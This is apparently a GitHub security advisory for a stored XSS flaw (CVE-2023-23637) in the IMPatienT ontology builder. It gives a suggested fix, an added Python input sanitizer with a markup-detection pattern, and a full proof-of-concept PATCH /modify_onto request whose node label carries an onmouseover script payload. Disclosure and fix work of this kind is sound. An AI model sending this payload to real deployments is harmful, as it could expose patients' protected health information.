CVE-2023-23637: [Security] IMPatienT v1.5.0 Stored Cross-Site Scripting (XSS) - CVE-2023-23637 · Issue #101 · lambda-science/IMPatienT
IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.
A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637):
Description:
IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify_onto request.
This may allow attackers to steal Protected Health Information (PHI).
Suggested Fix:
Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, consider encoding user input with HTML entity encoding or URL encoding before it is rendered.
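As an added illustration of the suggested fix (this is example code written for this page, not IMPatienT's own code), the function below validates and HTML-entity encodes the jsTree node list that the PATCH /modify_onto request carries, and reports any label that looked like markup so the handler can log it. It assumes the handler already has the request body as a Python list of dicts and that the application is a Flask app (the 127.0.0.1:5000 host in the payload suggests this); the field names and the MHO:nnnnnn identifier format are taken from the advisory's payload, while the function names and the strict patterns are assumptions of the example.

```python
"""Added example, not IMPatienT's own code: server-side validation and
HTML-entity encoding of the jsTree node list carried by PATCH /modify_onto.

Assumptions (not stated in the advisory): the handler already has the JSON
array from the request body as a list of dicts, and the application is a
Flask app (the 127.0.0.1:5000 host in the payload suggests it). Field names
and the MHO:nnnnnn identifier format come from the advisory's payload.
"""
import html
import json
import re

# Free-text fields that the ontology builder later renders into the page.
NODE_TEXT_FIELDS = ("text",)
DATA_TEXT_FIELDS = (
    "description", "synonymes", "alternative_language", "phenotype_datamined",
    "gene_datamined", "hpo_datamined", "correlates_with",
)
ID_RE = re.compile(r"^MHO:\d{6}$")              # e.g. MHO:000005
HEX_COLOR_RE = re.compile(r"^#[0-9a-fA-F]{6}$")
# A tag or inline event handler in a label is worth logging, not only escaping.
MARKUP_RE = re.compile(r"<[^>]*>|\bon\w+\s*=", re.IGNORECASE)


def looks_like_markup(value: str) -> bool:
    """Detection helper: True when a free-text value carries a tag or handler."""
    return bool(MARKUP_RE.search(value))


def sanitize_onto_nodes(nodes: list) -> tuple:
    """Return (clean_nodes, findings).

    Structured fields (ids, parent, colour) are validated against a strict
    pattern and the request is rejected with ValueError on mismatch.  Free
    text is HTML-entity encoded so the browser shows it literally.  The
    li_attr/a_attr ids are rebuilt from the validated id instead of trusting
    the client-supplied copies.  findings lists (id, field, value) for every
    value that looked like markup, for the caller to log.
    """
    clean, findings = [], []
    for node in nodes:
        node_id = str(node.get("id", ""))
        if not ID_RE.match(node_id):
            raise ValueError(f"invalid node id {node_id!r}")
        parent = str(node.get("parent", "#"))
        if parent != "#" and not ID_RE.match(parent):
            raise ValueError(f"invalid parent {parent!r} on {node_id}")

        out = dict(node)
        out["parent"] = parent
        out["li_attr"] = {"id": node_id}
        out["a_attr"] = {"href": "#", "id": f"{node_id}_anchor"}

        for field in NODE_TEXT_FIELDS:
            if isinstance(out.get(field), str):
                if looks_like_markup(out[field]):
                    findings.append((node_id, field, out[field]))
                out[field] = html.escape(out[field], quote=True)

        data = dict(out.get("data") or {})
        for field in DATA_TEXT_FIELDS:
            if isinstance(data.get(field), str):
                if looks_like_markup(data[field]):
                    findings.append((node_id, f"data.{field}", data[field]))
                data[field] = html.escape(data[field], quote=True)
        colour = data.get("hex_color")
        if colour is not None and not HEX_COLOR_RE.match(str(colour)):
            raise ValueError(f"invalid hex_color {colour!r} on {node_id}")
        data["image_annotation"] = bool(data.get("image_annotation", False))
        out["data"] = data
        clean.append(out)
    return clean, findings


# Constructed sample: a two-node subset of the advisory's payload, including
# the injected label from node MHO:000005.
SAMPLE_NODES = [
    {"id": "MHO:000001", "text": "Sample Keyword", "icon": True,
     "li_attr": {"id": "MHO:000001"},
     "a_attr": {"href": "#", "id": "MHO:000001_anchor"},
     "data": {"description": "", "synonymes": "",
              "alternative_language": "Sample Keyword",
              "hex_color": "#c7ef34", "image_annotation": False},
     "parent": "#"},
    {"id": "MHO:000005",
     "text": "Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>",
     "icon": True, "li_attr": {"id": "MHO:000005"},
     "a_attr": {"href": "#", "id": "MHO:000005_anchor"},
     "data": {"description": "", "synonymes": "", "alternative_language": "",
              "hex_color": "#094f6a", "image_annotation": True},
     "parent": "MHO:000001"},
]

if __name__ == "__main__":
    cleaned, hits = sanitize_onto_nodes(SAMPLE_NODES)
    for node_id, field, value in hits:
        print(f"markup in {node_id}.{field}: {value!r}")
    print(json.dumps(cleaned, indent=1))
```

Encoding on input, as the advisory suggests, is only half of the defence: the stored value is still rendered by the ontology builder's tree widget, so the template or tree configuration must also treat node labels as text rather than HTML, otherwise any value that reached the database by another path is rendered unescaped. The findings list exists so that a request carrying markup in a label can be logged and alerted on, not just silently neutralised.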
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637
https://nvd.nist.gov/vuln/detail/CVE-2023-23637
https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)
Payload:
PATCH /modify_onto HTTP/1.1
Host: 127.0.0.1:5000
Content-Length: 2218
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Origin: http://127.0.0.1:5000/
Referer: http://127.0.0.1:5000/ontocreate
Connection: close
[{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}]